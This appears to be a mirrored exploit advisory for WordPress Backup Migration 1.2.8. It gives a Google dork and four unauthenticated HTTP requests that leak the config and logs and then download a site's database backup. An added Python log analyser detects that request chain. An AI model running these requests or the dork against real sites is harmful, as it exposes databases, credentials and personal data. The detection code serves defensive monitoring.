## https://sploitus.com/exploit?id=PACKETSTORM:172515
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup  
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")  
# Date: 2023-05-10  
# Exploit Author: Wadeek  
# Vendor Homepage: https://backupbliss.com/  
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip  
# Version: 1.2.8  
# Tested on: WordPress 6.2  
  
1) Get the version of the plugin.  
  
=> GET /wp-content/plugins/backup-backup/readme.txt  
--------------------------------------------------------------------------  
Stable tag: 1.2.8  
--------------------------------------------------------------------------  
  
2) Get the name of the backup directory.  
  
=> GET /wp-content/backup-migration/config.json  
--------------------------------------------------------------------------  
{  
[...],  
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",  
[...],  
"OTHER:EMAIL":"admin@email.com"  
}  
--------------------------------------------------------------------------  
  
3) Get the name of the archive containing the backups.  
  
=> GET /wp-content/backup-migration/complete_logs.log  
--------------------------------------------------------------------------  
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip  
--------------------------------------------------------------------------  
  
4) Build the path for the download.  
  
=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
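
Defender-side detection for the four-step request chain above, written as an added example that is not part of the original advisory and not code from the plugin vendor. It parses web-server access logs in combined log format, maps each request path to the advisory step it corresponds to (readme probe, config.json, complete_logs.log, archive download under the randomised backup directory), and grades each client by how far along the chain it got with successful (200) responses. The log lines, the client addresses, the backup-directory suffix and the archive name in the sample are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2023:12:00:01 +0000] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 4212 "-" "curl/7.88"
203.0.113.5 - - [10/May/2023:12:00:03 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 200 1980 "-" "curl/7.88"
203.0.113.5 - - [10/May/2023:12:00:05 +0000] "GET /wp-content/backup-migration/complete_logs.log HTTP/1.1" 200 58213 "-" "curl/7.88"
203.0.113.5 - - [10/May/2023:12:00:09 +0000] "GET /wp-content/backup-migration-aB3dE9fGh1/backups/BM_Backup_2023-05-10_00_00_00_constructed.zip HTTP/1.1" 200 7340032 "-" "curl/7.88"
198.51.100.7 - - [10/May/2023:12:01:00 +0000] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 4212 "-" "Mozilla/5.0"
198.51.100.9 - - [10/May/2023:12:02:00 +0000] "GET /wp-content/backup-migration/config.json?x=1 HTTP/1.1" 403 199 "-" "curl/7.88"
"""

# Combined/common log format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each indicator is tied to the step number of the advisory it corresponds to.
INDICATORS = [
    (1, re.compile(r'^/wp-content/plugins/backup-backup/readme\.txt$')),
    (2, re.compile(r'^/wp-content/backup-migration/config\.json$')),
    (3, re.compile(r'^/wp-content/backup-migration/complete_logs\.log$')),
    (4, re.compile(r'^/wp-content/backup-migration-[^/]+/backups/[^/]+\.zip$')),
]


def parse_line(line):
    """Return a dict with ip/ts/method/path/status for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Drop any query string so "?x=1" cannot slip past the exact path match.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def classify(path):
    """Map a request path to the advisory step it matches (1-4), or None."""
    for step, rx in INDICATORS:
        if rx.match(path):
            return step
    return None


def severity(steps):
    """Grade a client by the furthest step it completed with a 200 response."""
    if 4 in steps:
        return "critical"   # archive actually served: treat as data exposure
    if 2 in steps and 3 in steps:
        return "high"       # both pieces needed to build the download path
    if 2 in steps or 3 in steps:
        return "medium"     # config or log leaked
    if 1 in steps:
        return "info"       # version probe only; common scanner noise
    return "none"


def analyze(log_text):
    """Correlate indicator hits per client IP and return a severity report."""
    per_ip = defaultdict(lambda: {"steps": set(), "blocked": 0})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        step = classify(rec["path"])
        if step is None:
            continue
        if rec["status"] == 200:
            per_ip[rec["ip"]]["steps"].add(step)
        else:
            # Non-200 (403/404) means the server refused the file; still worth noting.
            per_ip[rec["ip"]]["blocked"] += 1
    report = {}
    for ip, info in per_ip.items():
        steps = sorted(info["steps"])
        sev = severity(steps)
        if sev == "none" and info["blocked"]:
            sev = "blocked"
        report[ip] = {"steps": steps, "blocked": info["blocked"], "severity": sev}
    return report


if __name__ == "__main__":
    for ip, r in analyze(SAMPLE_LOG).items():
        print(f"{ip:15} severity={r['severity']:8} steps={r['steps']} blocked={r['blocked']}")
```

Run it against a real access log by passing the file contents to `analyze()`; a client graded "critical" or "high" means the backup artefacts were actually served, not merely requested. The 403 line in the sample shows what the same chain looks like once direct HTTP access to the plugin's working directory and the randomised backup directory is denied at the web server, which is the standard hardening for this class of exposure.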